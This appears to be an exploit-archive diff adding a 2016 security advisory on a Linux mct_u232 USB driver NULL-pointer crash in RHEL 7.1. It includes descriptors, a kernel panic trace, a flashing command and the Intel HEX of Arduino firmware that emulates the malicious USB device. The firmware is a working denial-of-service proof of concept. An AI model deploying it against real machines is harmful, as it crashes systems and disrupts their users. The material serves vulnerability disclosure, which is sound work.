+:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:10142400000000404C0544010001010203010902CF +:10143400270001010000FA0705810104040C0705D7 +:10144400010104000C0705820104000C07000700D9 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF diff --git a/platforms/linux/dos/39541.txt b/platforms/linux/dos/39541.txt new file mode 100755 index 000000000..07b0ff1fa --- /dev/null +++ b/platforms/linux/dos/39541.txt @@ -0,0 +1,641 @@ +OS-S Security Advisory 2016-08 +Linux mct_u232 Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: not yet assigned +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (mct_u232_m8 driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of advisory: https://os-s.net/advisories/OSS-2016-08_mct_u232.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB +device requiring the mct_u232_m8 driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x50d +idProduct: 0x109 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +This is the configuration descriptor containing only one interrupt-endpoint- +descriptor (IN-direction). +The mct_u232 driver assumes that there will be at least two endpoint- +descriptors configured as interrupt-in. +Since there is no sanity check, it is possible that the kernel tries to +dereference a null-pointer. +This results in a crash of the system. + +**** +$ nm mct_u232.ko.debug | grep mct_u232_port_probe +0000000000000fc0 t mct_u232_port_probe +$ addr2line -e mct_u232.ko.debug 0xFF9 +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/usb/serial/mct_u232.c:386 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/mct_u232.c) +... +377 static int mct_u232_port_probe(struct usb_serial_port *port) +378 { +379 struct mct_u232_private *priv; +380 +381 priv = kzalloc(sizeof(*priv), GFP_KERNEL); +382 if (!priv) +383 return -ENOMEM; +384 +385 /* Use second interrupt-in endpoint for reading. */ +386 priv->read_urb = port->serial->port[1]->interrupt_in_urb; /* missing +sanity check -> possible null-pointer dereference */ +387 priv->read_urb->context = port; +388 +389 spin_lock_init(&priv->lock); +390 +391 usb_set_serial_port_data(port, priv); +392 +393 return 0; +395 } +... +**** + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x3 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 ï?? IN-Direction +bmAttribut: 0x3 ï?? Interrupt-Transfer +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 ï??OUT-Direction +bmAttribut: 0x2 ï??Bulk-Transfer +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 ï??IN-Direction +bmAttribut: 0x1 ï??Bulk-Transfer +wMaxPacketSize: 0x4 +bInterval: 0xc + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +To this day, no security patch was provided by the vendor. +Since our 90-day Responsible Discourse deadline is expired, we publish this +Security Advisory. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283370 + +Kernel Stacktrace: + +[ 2273.524650] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 2273.741789] usb 1-1: New USB device found, idVendor=050d, idProduct=0109 +[ 2273.749429] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 2273.757144] usb 1-1: Product: Ä? +[ 2273.760821] usb 1-1: Manufacturer: Ä? +[ 2273.763500] usb 1-1: SerialNumber: % +[ 2273.768699] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc +says 96 microframes +[ 2273.814069] usbcore: registered new interface driver mct_u232 +[ 2273.820979] usbserial: USB Serial support registered for MCT U232 +[ 2273.833864] mct_u232 1-1:1.0: MCT U232 converter detected +[ 2273.838511] BUG: unable to handle kernel NULL pointer dereference at +0000000000000158 +[ 2273.839330] IP: [] mct_u232_port_probe+0x39/0x70 [mct_u232] +[ 2273.839330] PGD 0 +[ 2273.839330] Oops: 0000 [#1] SMP +[ 2273.839330] Modules linked in: mct_u232(+) ip6t_rpfilter ip6t_REJECT +ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc +ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 +nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter +ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat +nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter +ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper +drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c +sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix +libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod +[ 2273.839330] CPU: 0 PID: 8890 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 2273.839330] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 2273.839330] task: ffff88000f546660 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000 +[ 2273.839330] RIP: 0010:[] [] +mct_u232_port_probe+0x39/0x70 [mct_u232] +[ 2273.839330] RSP: 0018:ffff88000f4cf908 EFLAGS: 00010286 +[ 2273.839330] RAX: ffff88000d9b49a0 RBX: ffff88000c34e800 RCX: 0000000000000000 +[ 2273.839330] RDX: 0000000000000000 RSI: ffff88000d9b49a0 RDI: ffff88000c34eab0 +[ 2273.839330] RBP: ffff88000f4cf910 R08: 00000000000163c0 R09: ffff88000e401c00 +[ 2273.839330] R10: ffffffffa0393fe3 R11: 0000000000000004 R12: 0000000000000000 +[ 2273.839330] R13: ffff88000c34e800 R14: ffffffffa0396000 R15: ffffffffa0396000 +[ 2273.839330] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 2273.839330] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 2273.839330] CR2: 0000000000000158 CR3: 000000000f70c000 CR4: +00000000000006f0 +[ 2273.839330] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 2273.839330] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 2273.839330] Stack: +[ 2273.839330] ffff88000c34eab0 ffff88000f4cf940 ffffffff81461cf6 ffff88000c34eab0 +[ 2273.839330] ffff88000c34eab0 ffffffffa0396028 ffff88000c34eab0 ffff88000f4cf968 +[ 2273.839330] ffffffff813d30d7 ffffffffa0396028 ffff88000c34eab0 ffffffff813d33e0 +[ 2273.839330] Call Trace: +[ 2273.839330] [] usb_serial_device_probe+0x56/0x110 +[ 2273.839330] [] driver_probe_device+0x87/0x390 +[ 2273.839330] [] ? driver_probe_device+0x390/0x390 +[ 2273.839330] [] __device_attach+0x3b/0x40 +[ 2273.839330] [] bus_for_each_drv+0x6b/0xb0 +[ 2273.839330] [] device_attach+0x88/0xa0 +[ 2273.839330] [] bus_probe_device+0x98/0xc0 +[ 2273.839330] [] device_add+0x4c4/0x7a0 +[ 2273.839330] [] usb_serial_probe+0x1123/0x1230 +[ 2273.839330] [] ? ida_get_new_above+0x7c/0x2a0 +[ 2273.839330] [] ? kmem_cache_alloc+0x1ba/0x1d0 +[ 2273.839330] [] ? sysfs_addrm_finish+0x42/0xe0 +[ 2273.839330] [] ? __sysfs_add_one+0x61/0x100 +[ 2273.839330] [] usb_probe_interface+0x1c4/0x2f0 +[ 2273.839330] [] driver_probe_device+0x87/0x390 +[ 2273.839330] [] __driver_attach+0x93/0xa0 +[ 2273.839330] [] ? __device_attach+0x40/0x40 +[ 2273.839330] [] bus_for_each_dev+0x73/0xc0 +[ 2273.839330] [] driver_attach+0x1e/0x20 +[ 2273.839330] [] usb_serial_register_drivers+0x29b/0x580 +[ 2273.839330] [] ? 0xffffffffa0398fff +[ 2273.839330] [] usb_serial_module_init+0x1e/0x1000 [mct_u232] +[ 2273.839330] [] do_one_initcall+0xb8/0x230 +[ 2273.839330] [] load_module+0x133e/0x1b40 +[ 2273.839330] [] ? ddebug_proc_write+0xf0/0xf0 +[ 2273.839330] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 2273.839330] [] SyS_finit_module+0xa6/0xd0 +[ 2273.839330] [] system_call_fastpath+0x16/0x1b +[ 2273.839330] Code: 00 00 48 89 e5 53 48 89 fb 48 8b 3d aa 3e aa e1 e8 9d 7a +e1 e0 48 85 c0 74 38 48 8b 13 48 8d bb b0 02 00 00 48 89 c6 48 8b 52 28 <48> +8b 92 58 01 00 00 48 89 10 48 89 9a b0 00 00 00 c7 40 08 00 +[ 2273.839330] RIP [] mct_u232_port_probe+0x39/0x70 [mct_u232] +[ 2273.839330] RSP +[ 2273.839330] CR2: 0000000000000158 +[ 2274.348716] ---[ end trace b239663354a1c556 ]--- +[ 2274.356144] Kernel panic - not syncing: Fatal exception +[ 2274.357102] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 